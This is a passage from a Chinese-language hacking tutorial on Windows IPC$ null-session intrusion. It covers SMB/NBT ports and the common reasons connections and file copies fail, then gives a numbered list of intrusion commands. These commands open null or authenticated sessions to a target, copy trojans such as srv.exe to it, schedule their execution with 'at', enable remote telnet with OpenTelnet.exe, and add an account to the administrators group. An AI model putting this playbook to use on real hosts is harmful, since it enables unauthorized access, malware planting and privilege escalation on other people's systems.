五 ipc$所使用的端口

首先我们来了解一些基础知识：
1 SMB:(Server Message Block) Windows协议族，用于文件打印共享的服务；
2 NBT:(NETBios Over TCP/IP)使用137（UDP）138（UDP）139（TCP）端口实现基于TCP/IP协议的NETBIOS网络互联。
3 在WindowsNT中SMB基于NBT实现，而在Windows2000中，SMB除了基于NBT实现，还可以直接通过445端口实现。

有了这些基础知识，我们就可以进一步来讨论访问网络共享对端口的选择了：

对于win2000客户端来说：
1 如果在允许NBT的情况下连接服务器时，客户端会同时尝试访问139和445端口，如果445端口有响应，那么就发送RST包给139端口断开连接，用455端口进行会话，当445端口无响应时，才使用139端口，如果两个端口都没有响应，则会话失败；
2 如果在禁止NBT的情况下连接服务器时，那么客户端只会尝试访问445端口，如果445端口无响应，那么会话失败。由此可见，禁止了NBT后的win 2000对win NT的共享访问将会失败。

对于win2000服务器端来说：
1 如果允许NBT, 那么UDP端口137, 138, TCP 端口 139, 445将开放；
2 如果禁止NBT，那么只有445端口开放。

我们建立的ipc$会话对端口的选择同样遵守以上原则。显而易见，如果远程服务器没有监听139或445端口，ipc$会话是无法建立的。

六 ipc$连接在hack攻击中的意义

就像上面所说的，即使你建立了一个空的连接，你也可以获得不少的信息（而这些信息往往是入侵中必不可少的），如果你能够以某一个具有一定权限的用户身份登陆的话，那么你就会得到相应的权限，显然，如果你以管理员身份登陆,嘿嘿,那你可就了不得了，基本上可以为所欲为了。不过你也不要高兴的太早，因为管理员的密码不是那么好搞到的，虽然会有一些粗心的管理员存在弱口令，但这毕竟是少数，而且现在不比从前了，随着人们安全意识的提高，管理员们也愈加小心了，得到管理员密码将会越来越难的，因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接，甚至在主机不开启ipc$共享时，你根本就无法连接，你会慢慢的发现ipc$连接并不是万能的，所以不要奢望每次连接都能成功，那是不现实的。
是不是有些灰心？倒也不用,关键是我们要摆正心态，不要把ipc$入侵当作终极武器，不要认为它战无不胜,它只是很多入侵方法中的一种，你有可能利用它一击必杀，也有可能一无所获，这些都是正常的，在黑客的世界里，不是每条大路都能通往罗马，但总有一条路会通往罗马，耐心的寻找吧！

七 ipc$连接失败的常见原因

以下是一些常见的导致ipc$连接失败的原因：

1 IPC连接是Windows NT及以上系统中特有的功能，由于其需要用到Windows NT中很多DLL函数，所以不能在Windows 9.x/Me系统中运行，也就是说只有nt/2000/xp才可以相互建立ipc$连接，98/me是不能建立ipc$连接的；

2 如果想成功的建立一个ipc$连接，就需要对方开启ipc$共享，即使是空连接也是这样，如果对方关闭了ipc$共享，你将会建立失败；

3 你未启动Lanmanworkstation服务，它提供网络链结和通讯，没有它你无法发起连接请求（显示名为：Workstation）；

4 对方未启动Lanmanserver服务，它提供了 RPC 支持、文件、打印以及命名管道共享，ipc$依赖于此服务，没有它远程主机将无法响应你的连接请求（显示名为：Server）；

5 对方未启动NetLogon，它支持网络上计算机 pass-through 帐户登录身份；

6 对方禁止了NBT（即未打开139端口）；

7 对方防火墙屏蔽了139和445端口；

8 你的用户名或者密码错误（显然空会话排除这种错误）；

9 命令输入错误：可能多了或少了空格，当用户名和密码中不包含空格时两边的双引号可以省略，如果密码为空，可以直接输入两个引号""即可；

10 如果在已经建立好连接的情况下对方重启计算机，那么ipc$连接将会自动断开，需要重新建立连接。

另外,你也可以根据返回的错误号分析原因：
错误号5，拒绝访问：很可能你使用的用户不是管理员权限的，先提升权限；
错误号51，Windows无法找到网络路径：网络有问题；
错误号53，找不到网络路径：ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）；
错误号67，找不到网络名：你的lanmanworkstation服务未启动或者目标删除了ipc$；
错误号1219，提供的凭据与已存在的凭据集冲突：你已经和对方建立了一个ipc$，请删除再连；
错误号1326，未知的用户名或错误密码：原因很明显了；
错误号1792，试图登录，但是网络登录服务没有启动：目标NetLogon服务未启动；
错误号2242，此用户的密码已经过期：目标有帐号策略，强制定期要求更改密码。

八 复制文件失败的原因

有些朋友虽然成功的建立了ipc$连接，但在copy时却遇到了这样那样的麻烦，无法复制成功，那么导致复制失败的常见原因又有哪些呢？

1 盲目复制
这类错误出现的最多，占到50%以上。许多朋友甚至都不知道对方是否有共享文件夹，就进行盲目复制，结果导致复制失败而且郁闷的很。因此我建议大家在进行复制之前务必用net view \\IP这个命令看一下对方的共享情况，不要认为ipc$连接建立成功了就一定有共享文件夹。  

2 默认共享判断错误
这类错误也是大家经常犯的，主要有两个小方面：

1）错误的认为能建立ipc$连接的主机就一定开启了默认共享，因而在建立完连接之后马上向admin$之类的默认共享复制文件，导致复制失败。ipc$连接成功只能说明对方打开了ipc$共享，ipc$共享与默认共享是两码事，ipc$共享是一个命名管道，并不是哪个实际的文件夹，而默认共享并不是ipc$共享的必要条件；

2）由于net view \\IP 无法显示默认共享（因为默认共享带$），因此通过这个命令，我们并不能判断对方是否开启了默认共享，因此如果对方未开启默认共享，那么所有向默认共享进行的操作都不能成功；（不过大部分扫描软件在扫弱口令的同时，都能扫到默认共享目录，可以避免此类错误的发生）

3用户权限不够，包括四种情形：
1）空连接向所有共享（默认共享和普通共享）复制时，大多情况下权限是不够的；
2）向默认共享复制时，要具有管理员权限；
3）向普通共享复制时，要具有相应权限（即对方事先设定的访问权限）；
4）对方可以通过防火墙或安全软件的设置，禁止外部访问共享；

还需要说明一点：不要认为administrator就一定是管理员，管理员名称是可以改的。

4被防火墙杀死或在局域网
也许你的复制操作已经成功，但当远程运行时，被防火墙杀掉了，导致找不到文件；还有可能你把木马复制到了局域网内的主机，导致连接失败。因此建议你复制时要小心，否则就前功尽弃了。

呵呵，大家也知道，ipc$连接在实际操作过程中会出现千奇百怪的问题，上面我所总结的只是一些常见错误，没说到的，只能让大家自己去体会了。

九 如何打开目标的IPC$共享以及其他共享

目标的ipc$不是轻易就能打开的，否则就要天下打乱了。你需要一个admin权限的shell,比如telnet,木马等，然后在shell下执行net share ipc$来开放目标的ipc$，用net share ipc$ /del来关闭共享。如果你要给它开共享文件夹，你可以用net share baby=c:\，这样就把它的c盘开为共享名为baby共享了。

十 一些需要shell才能完成的命令

看到很多教程这方面写的十分不准确，一些需要shell才能完成命令就简简单单的在ipc$连接下执行了，起了误导作用。那么下面我总结一下需要在shell才能完成的命令：

1 向远程主机建立用户，激活用户，修改用户密码，加入管理组的操作需要在shell下完成；

2 打开远程主机的ipc$共享，默认共享，普通共享的操作需要在shell下完成；

3 运行/关闭远程主机的服务，需要在shell下完成；

4 启动/杀掉远程主机的进程，也需要在shell下完成。

十一 入侵中可能会用到的相关命令

请注意命令适用于本地还是远程，如果适用于本地，你只能在获得远程主机的shell后，才能向远程主机执行。

1 建立空连接:
net use \\IP\ipc$ "" /user:""        

2 建立非空连接:
net use \\IP\ipc$ "psw" /user:"account"    

3 查看远程主机的共享资源（但看不到默认共享）
net view \\IP

4 查看本地主机的共享资源（可以看到本地的默认共享）
net share

5 得到远程主机的用户名列表
nbtstat -A IP

6 得到本地主机的用户列表
net user

7 查看远程主机的当前时间
net time \\IP

8 显示本地主机当前服务
net start

9 启动/关闭本地服务
net start 服务名 /y
net stop 服务名 /y

10 映射远程共享:
net use z: \\IP\baby
此命令将共享名为baby的共享资源映射到z盘      

11 删除共享映射
net use c: /del 删除映射的c盘，其他盘类推
net use * /del /y删除全部

12 向远程主机复制文件
copy \路径\srv.exe \\IP\共享目录名，如：
copy ccbirds.exe \\*.*.*.*\c 即将当前目录下的文件复制到对方c盘内

13 远程添加计划任务
at \\ip 时间 程序名，如：

at \\127.0.0.0 11:00 love.exe
注意：时间尽量使用24小时制；在系统默认搜索路径（比如system32/）下不用加路径，否则必须加全路径

14 开启远程主机的telnet
这里要用到一个小程序：opentelnet.exe，各大下载站点都有，而且还需要满足四个要求：

1）目标开启了ipc$共享
2）你要拥有管理员密码和帐号
3）目标开启RemoteRegistry服务，用户就该ntlm认证
4）对WIN2K/XP有效，NT未经测试
命令格式：OpenTelnet.exe \\server account psw NTLM认证方式 port
试例如下：c:\>OpenTelnet.exe \\*.*.*.* administrator "" 1 90

15 激活用户/加入管理员组
1 net uesr account /active:yes
2 net localgroup administrators account /add

16 关闭远程主机的telnet
同样需要一个小程序：ResumeTelnet.exe
命令格式：ResumeTelnet.exe \\server account psw
试例如下：c:\>ResumeTelnet.exe \\*.*.*.* administrator ""

17 删除一个已建立的ipc$连接
net use \\IP\ipc$ /del